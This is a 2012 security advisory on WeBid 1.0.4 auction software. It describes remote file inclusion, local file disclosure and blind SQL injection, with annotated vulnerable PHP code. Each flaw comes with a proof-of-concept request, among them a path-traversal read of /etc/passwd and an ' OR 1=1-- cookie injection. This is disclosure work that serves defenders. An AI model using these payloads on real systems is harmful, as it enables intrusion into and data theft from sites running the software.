WeBid versions 1.0.4 and below suffer from local file disclosure, remote file inclusion, and remote SQL injection vulnerabilities.
cadf34d43c06b4a8884f133bd4533936acc454d86939dd74decdbe83787a788e
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-08-17 ]
################################################
# [ WeBid <= 1.0.4 ] Multiple Vulnerabilities #
################################################
#
# Script: "Open source php/mysql fully featured auction script"
#
# Vendor: http://www.webidsupport.com/
# Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/
#
################################################
# [RFI] ( allow_url_include = On; register_globals = On; )
# PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt?
#
# File: ./WeBid/loader.php (lines: 15-60)
# ..cut..
# ob_start('ob_gzhandler');
# header("Content-type: text/javascript");
# include 'includes/checks/files.php'; // 1 ( Definition of $file_hashs array )
# if (isset($_GET['js']))
# {
# $js = explode(';', $_GET['js']); // 3 js = admin/logout.php (for example)
# foreach ($js as $val)
# {
# $ext = substr($val, strrpos($val, '.') + 1); // 4
# if ($ext == 'php') // 4
# {
# if (check_file($val)) // 5
# {
# include $val; // 10 include admin/logout.php
# }
# }
# ..cut..
# }
# }
# ob_end_flush();
#
# function check_file($file)
# {
# global $file_hashs; // 6
# $tmp = $file_hashs;
# $folders = explode('/', $file); // 7 $folders = Array([0] => admin, [1] => logout.php)
# foreach ($folders as $val) // 8 This loop checks if parts of $folders are in $file_hashs
# {
# if (isset($tmp[$val]))
# {
# $tmp = $tmp[$val];
# }
# else
# {
# return false;
# }
# }
# return true; // 9 admin/logout.php passed
# }
# ..cut..
#
# File: ./WeBid/includes/checks/files.php (lines: 2-19)
# ..cut..
# $file_hashs = array( // 2 List of files that can be included.
# ..cut..
# 'admin' => array( // 2
# 'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2
# ..cut..
# ),
# ..cut..
# );
#
# File: ./WeBid/admin/logout.php (lines: 16-17)
# ..cut.. // 11 common.inc.php file contains a definition of $include_path
# include '../includes/common.inc.php'; // 11 Failed, because loader.php is in root path
# include $include_path . 'functions_admin.php'; // 12 *[RFI] $include_path is not set by script
# ..cut.. // 12 If register_globals is On, we can set $include_path
#
################################################
# [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 )
# PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
#
# File: ./WeBid/getthumb.php (lines: 17-52)
# ..cut..
# $w = (isset($_GET['w'])) ? $_GET['w'] : ''; // 1
# $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : ''; // 2
# $nomanage = false;
# ..cut..
# if (!isset($_GET['fromfile'])) // 3
# {
# ErrorPNG('params empty');
# exit;
# }
# elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r')) // 4
# {
# ErrorPNG('img does not exist');
# exit;
# }
#
# if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile))) // 5
# {
# $img = getimagesize($fromfile);
# if ($img[2] == 1)
# {
# $img['mime'] = 'image/png';
# }
# header('Content-type: ' . $img['mime']);
# echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD]
# }
# }
# ..cut..
#
################################################
# [Blind SQL Injection] ( magic_quotes_gpc = Off; )
# PoC:
# http://localhost/WeBid/contents.php
# GET /WeBid/contents.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Cookie: WEBID_ONLINE=-1' OR 1=1--
#
# File: ./WeBid/contents.php (lines: 15, 38)
# ..cut..
# include 'includes/common.inc.php';
# ..cut..
# include 'header.php'; // 1
# ..cut..
#
# File: ./WeBid/header.php (line: 26)
# ..cut..
# $counters = load_counters(); // 2
# ..cut..
#
# File: ./WeBid/includes/functions_global.php (line: 287-320)
# ..cut..
# function load_counters() // 3
# {
# ..cut..
# if (!$user->logged_in)
# {
# if (!isset($_COOKIE['WEBID_ONLINE']))
# {
# $s = md5(rand(0, 99) . session_id());
# setcookie('WEBID_ONLINE', $s, time() + 900);
# }
# else
# {
# $s = $_COOKIE['WEBID_ONLINE']; // 4
# setcookie('WEBID_ONLINE', $s, time() + 900);
# }
# }
# ..cut..
# $query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL]
# $res = mysql_query($query);
# $system->check_mysql($res, $query, __LINE__, __FILE__);
# ..cut..
#
### [ dun / 2012 ] #############################